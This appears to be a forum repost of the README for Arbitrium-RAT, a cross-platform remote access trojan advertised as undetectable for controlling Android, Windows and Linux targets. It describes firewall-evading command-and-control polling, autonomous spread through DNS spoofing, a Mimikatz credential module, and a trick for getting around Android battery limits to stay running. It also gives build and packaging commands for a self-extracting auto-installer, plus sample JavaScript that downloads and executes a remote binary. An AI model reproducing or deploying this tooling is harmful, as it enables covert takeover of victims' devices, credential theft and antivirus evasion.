Hacking Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux

[Soldier]

Arbitrium is a cross-platform is a remote access trojan (RAT), Fully UnDetectable (FUD), It allows you to control Android, Windows and Linux and doesn't require any firewall exceptions or port forwarding. It gives access to the local networks, you can use the targets as a HTTP proxy and access Router, discover local IPs and scan their ports. Includes modules like Mimikatz, new modules can easily be added. In addition, if Arbitrium is used with a DNS spoofing software is can spread autonomously between devices (#AutoSpread). Arbitrium is a project of multiple parts, the parts were built using Java, JS, C, Python, Cordova and VueJS.

Demo:

Features:​

• FUD

The client uses simple tools which makes it completely undetectable, the trojan based on netcat mainly pipe TCP paquets to run the server's commands.

• Firewall

Arbitrium doesn't require adding an exception to the firewall, or a port forwarding rule. The server is an API with endpoints that receives tasks for a specific target and others that the trojan periodically request to get the new instructions, the instructions can be a JavaScript file (the Android app is made using Cordova) or a Shell file to run in the terminal/CMD. Once the server receives a task for a device, the former schedule the task then it opens a child process where it waits for the trojan's response by listening to a dedicated ephemeral port. Therefore, the trojan doesn't need to listen to any port.

• Battery optimization / StealthMode

Unlike with Stock Android, customizations like MIUI by Xiaomi, EMUI by Huawei or Samsung's Android Pie ignore the permissions/exceptions given to an app by the user. So if you try to run an Android's trojan in the background, the moment the app start running frequent or heavy (in some cases even lightweight) tasks (ex: sending http requests periodically) it will be killed no matter what permissions the user grants, ths OS completely ignores the current settings, dontkillmyapp.com is an known website dedicated for this particular issue.

The aforementioned issue was quite annoying while working on this project, after awhile I found that building a lightweight binary that keeps running the assigned tasks in the background while the MainActivity stand still just after launching the binary apears to bypass most the restrictions and actually even improve the performance of the App.

MainActivity receives a JS file from the server and uses ThreadPoolExecutor to initiate the binary without hanging for it to exit (More on this StealthMode/BatteryBypass).

• Web interface

There is also a control panel, it's not a requirement but an extension, it's a simple VueJS webapp, a UI you can use to control the targets instead of directely sending requests to the API. The webapp is available here: Arbitrium WebApp

Requirements​

1. Android's client

Java ver ...
Cordova
Android SDK & NDK

1. Windows/Linux client

Python3.6 (or newer)
PyInquirer
Winrar (Windows only)

Build​

use setAPI_FQDN.sh first to set the server domain/IP in all files

Clone repo:

git clone BenChaliah/Arbitrium-RAT --recursive

1. Android

$ cd ArbitriumClients/AndroidApp/ClientApp/
$ cordova build android
$ cd ../StealthMode/
$ make clean && make build

The binaries inside /libs are stripped, so it recommended to use these if you're not debuging.

1. Windows

$ cd ArbitriumClients\WindowsApp
$ pyinstaller --onefile runFrame.py
$ copy Client_tools\toolbox.exe dist\
$ copy Client_tools\SFXAutoInstaller.conf dist\
$ copy Client_tools\start_script.vbs dist\
$ cd dist
$ {Rar_abspath} a -r -cfg -sfx -z"SFXAutoInstaller.conf" Standalone.exe

Components​

1. Server API

The binaries built for Android should be put inside /assets (rename them to binary_{cpuabi}) and the APK will download them, but if you wish to put them inside the APK just make sure to extract them inside the App data folder /data/data/package_name or create a symbolic link inside it window.MyOrangePlugin.exec("/system/bin/ln -s ...

$ pip install flask flask_cors && ./runserver.sh # Python2.7

├── runserver.sh
├── main.py
├── reverse_http.py
├── initProxy.py
│
├── assets (src: ArbitriumClients/AndroidApp/StealthMode)
│ ├── runFrame_arm64-v8a
│ ├── toolbox_arm64-v8a
│ ├── ... (x86, x86_64, armeabi-v7a)
│
│
├── JS_scripts
│ ├── checkupdate.js
│ ├── init.js
│ ├── runshell.js
│ └── StealthMode.js
│
├── misc
│
├── modules
│ ├── discover.py
│ ├── mimikatz.py
│ ├── ports.py
│ └── runCMD.py
│
└── threads

​

1. Client/Trojan (Android): The app is build using Cordova for its simplicity and support for cross-platform developpement. This app relays of two main parts

   1. netbolt-orange-plugin:​

      this is a cordova plugin I made, it contains few functions that we can call from index.html, scripts downloaded via /checkupdate.js mainly use these methods to run the assigned task
      + exec() : execute shell cmd then returns the cmd output, it runs on the UI thread
      + poolexec() : same as 'exec()', but this one uses the ThreadPoolExecutor so the App can run a cmd without blocking the main thread, when the output is ready, it sent via a callback with the exit status
      + download() : this one is for downloading whatever resources the API or the admin may want or need to execute a task
2. Example: The trojan at first requests /checkupdate.js, let assumes this is an Android phone and we want to initiate the StealthMode/BatteryBypass to avoid getting killed (Battery optimizations ...), the API then responde with something like:
   function sfunc1(){
   window.MyOrangePlugin.download([{Link for ELF} ...], function(res){
   sfunc2(...);
   });
   }
   function sfunc2(...){
   window.MyOrangePlugin.exec("chmod ... ", function(res){
   sfunc3(...);
   });
   }
   function sfunc3(...){
   window.MyOrangePlugin.poolexec({Here we start the binary the will keep interacting with the API}, function(res){
   ...
   });
   }
   The app also uses a slightly customized version of Cordova background mode plugin.
   
   
   
   Download